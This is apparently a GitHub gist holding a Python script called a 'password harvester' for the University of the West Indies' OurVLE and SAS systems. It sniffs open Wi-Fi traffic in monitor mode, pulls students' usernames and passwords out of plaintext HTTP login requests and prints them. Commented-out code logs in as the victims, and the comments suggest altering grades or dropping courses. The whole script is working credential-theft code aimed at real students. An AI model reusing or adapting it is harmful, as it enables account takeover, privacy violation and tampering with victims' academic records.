Created
September 19, 2012 05:18
-
-
Save JonCooperWorks/3747812 to your computer and use it in GitHub Desktop.
Tool to harvest passwords from UWI's OurVLE system.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
''' | |
UWI data harvester. Created by Jonathan Cooper. | |
Based loosly on idiocy.py by Jonty (https://github.com/Jonty/) | |
Dumps UWI student information sent over an open hotspot by scanning | |
traffic to OurVLE. This also works with SAS by scanning port 9010 | |
instead of 80 and checking for POST requests to /pls/data_mona/twbkwbis.P_ValLogin | |
with host sas.uwimona.edu.jm:9010. | |
To run, just type | |
sudo ifconfig iwconfig mon0 mode monitor && mon0 up && python password_harvester.py -i mon0 | |
into a shell. | |
''' | |
import os | |
import getopt | |
import sys | |
import pcap | |
import dpkt | |
import re | |
import ourvle | |
import sas | |
def usage(): | |
print >>sys.stderr, 'Usage: %s [-i device]' % sys.argv[0] | |
sys.exit(1) | |
def main(): | |
opts, args = getopt.getopt(sys.argv[1:], 'i:h') | |
device = None | |
for o, a in opts: | |
if o == '-i': | |
device = a | |
else: | |
usage() | |
cap = pcap.pcap(device) | |
cap.setfilter('dst port 8080') | |
processed = {} | |
print 'Scanning . . .' | |
#Scan all traffic on port 80 | |
for ts, raw in cap: | |
eth = dpkt.ethernet.Ethernet(raw) | |
# Depending on platform, we can either get fully formed packets or unclassified radio data | |
if isinstance(eth.data, str): | |
data = eth.data | |
else: | |
data = eth.data.data.data | |
#Dump any HTTP requests going to OurVLE | |
if 'Host: ourvle.mona.uwi.edu' in data: | |
print data | |
#Detect if a user is logging in to OurVLE | |
if 'Host: ourvle.mona.uwi.edu' in data and ('POST /login/index.php' in data or 'POST http://ourvle.mona.uwi.edu/login/index.php' in data): | |
#Look for username:password combo in file | |
cred_pattern = re.search('username=(\d{9})&password=(.*)$', data) | |
credentials = { | |
'username' : cred_pattern.group(1), | |
'password' : cred_pattern.group(2), | |
} | |
#Print it to screen | |
print credentials | |
''' | |
To log into OurVLE as the student, and get their name and courses, uncomment | |
the code below. Not recommended to do so in this loop, since it will slow down the | |
harvesting. Instead, generate a list of names and run this code against it after | |
you have harvested enough username/password combinations. | |
''' | |
#browser = ourvle.Browser() | |
#print browser.login(credentials['username'], credentials['password']) | |
''' | |
The below commented lines of code allow for SAS access. Currently, it only downloads | |
a timetable because jail isn't fun. The above performance concern applies here too, | |
so do them both as post-processing of the harvested data. This could, however, be | |
modified to steal their grades or drop their courses. | |
''' | |
#browser = sas.SASBrowser() | |
#print browser.timetable(credentials['username'], credentials['password']) | |
else: | |
continue | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
How can I get in contact with you? Would like more information on your Blaze project. cleaon@live.com